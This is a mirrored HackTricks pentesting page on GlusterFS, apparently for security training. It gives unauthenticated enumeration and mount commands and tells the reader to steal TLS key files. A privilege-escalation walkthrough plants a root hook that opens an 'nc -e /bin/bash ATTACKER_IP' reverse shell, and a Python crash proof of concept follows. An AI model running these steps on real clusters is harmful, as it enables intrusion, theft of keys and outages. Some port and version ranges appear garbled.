maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md

133 lines
4.7 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 24007-24008-24009-49152 - Pentesting GlusterFS
{{#include ../banners/hacktricks-training.md}}
## Basic Information
**GlusterFS** is a **distributed file system** that combines storage from multiple servers into one **unified namespace**. The management daemon (`glusterd`) listens by default on **24007/TCP** and instructs data-plane bricks that start at **49152/TCP** (one port per brick, incrementing). Versions prior to 9.x used **2400824009/TCP** for brick transport, so you will still encounter those ports in legacy clusters.
```
PORT STATE SERVICE VERSION
24007/tcp open glusterd GlusterFS (RPC)
49152/tcp open gluster-brick SSL (TLS optional)
```
> Tip: 24007 answers RPC calls even when the storage-only nodes do **not** export any volume; therefore the service is a reliable pivot target inside large infrastructures.
## Enumeration
Install the client utilities on your attacking box:
```bash
sudo apt install -y glusterfs-cli glusterfs-client # Debian/Ubuntu
```
1. **Peer discovery & health**
```bash
# List peers (works without authentication in default setups)
gluster --remote-host 10.10.11.131 peer status
```
2. **Volume reconnaissance**
```bash
# Retrieve the list of all volumes and their configuration
gluster --remote-host 10.10.11.131 volume info all
```
3. **Mount without privileges**
```bash
sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/gluster
```
If mounting fails, check `/var/log/glusterfs/<vol_name>-<uid>.log` on the client side. Common issues are:
* TLS enforcement (`option transport.socket.ssl on`)
* Address based access control (`option auth.allow <cidr>`)
### Certificate troubleshooting
Steal the following files from any authorised client node and place them in `/etc/ssl/` (or the directory shown in the error log):
```
/etc/ssl/glusterfs.pem
/etc/ssl/glusterfs.key
/etc/ssl/glusterfs.ca
```
---
## Known Vulnerabilities (2022-2025)
| CVE | Affected versions | Impact | Notes |
|-----|-------------------|--------|-------|
| **CVE-2022-48340** | 10.010.4, 11.0 | Use-after-free in `dht_setxattr_mds_cbk` reachable through the network | Remote **DoS** and probable RCE. Fixed in 10.4.1 / 11.1. |
| **CVE-2023-26253** | < 11.0 | Out-of-bounds read in FUSE notify handler | Remote crash via crafted FS operations; public PoC available. |
| **CVE-2023-3775** | < 10.5 / 11.1 | Incorrect permission validation when mounting `gluster_shared_storage` | Lets any unauthenticated client mount the admin volume leads to **priv-esc** explained below. |
> Always check `gluster --version` **on every node**; heterogeneous clusters are common after partial upgrades.
### Exploiting `gluster_shared_storage` (Privilege Escalation)
Even in recent versions many administrators leave the special `gluster_shared_storage` volume world-readable because it simplifies geo-replication. The volume contains cronjob templates that run with **root** on every node.
```bash
# 1. Mount admin volume anonymously
mkdir /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss
# 2. Drop malicious script that gets synchronised cluster-wide
cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh
#!/bin/bash
nc -e /bin/bash ATTACKER_IP 4444 &
EOF
chmod +x /tmp/gss/hooks/1/start/post/test.sh
# 3. Wait until glusterd distributes the hook and executes it as root
```
If `hooks/1/` is not present, look for `/ss_bricks/` the exact path may vary with the major version.
### Denial-of-Service PoC (CVE-2023-26253)
```python
#!/usr/bin/env python3
# Minimal reproducer: sends malformed NOTIFY_REPLY XDR frame to 24007
import socket, xdrlib, struct
p = xdrlib.Packer(); p.pack_uint(0xdeadbeef)
with socket.create_connection(("10.10.11.131",24007)) as s:
s.send(struct.pack("!L", len(p.get_buffer())|0x80000000))
s.send(p.get_buffer())
```
Running the script crashes `glusterfsd` < 11.0.
---
## Hardening & Detection
* **Upgrade** current LTS is 11.1 (July 2025). All CVEs above are fixed.
* Enable **TLS** for every brick:
```bash
gluster volume set <vol> transport.socket.ssl on
gluster volume set <vol> transport.socket.ssl-cert /etc/ssl/glusterfs.pem
```
* Restrict clients with CIDR lists:
```bash
gluster volume set <vol> auth.allow 10.0.0.0/24
```
* Expose management port 24007 only on a **private VLAN** or through SSH tunnels.
* Watch logs: `tail -f /var/log/glusterfs/glusterd.log` and configure **audit-log** feature (`volume set <vol> features.audit-log on`).
---
## References
* [GlusterFS security advisories](https://docs.gluster.org/en/latest/release-notes/#security)
* [CVE-2023-26253 PoC github.com/tinynetwork/gluster-notify-crash](https://github.com/tinynetwork/gluster-notify-crash)
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink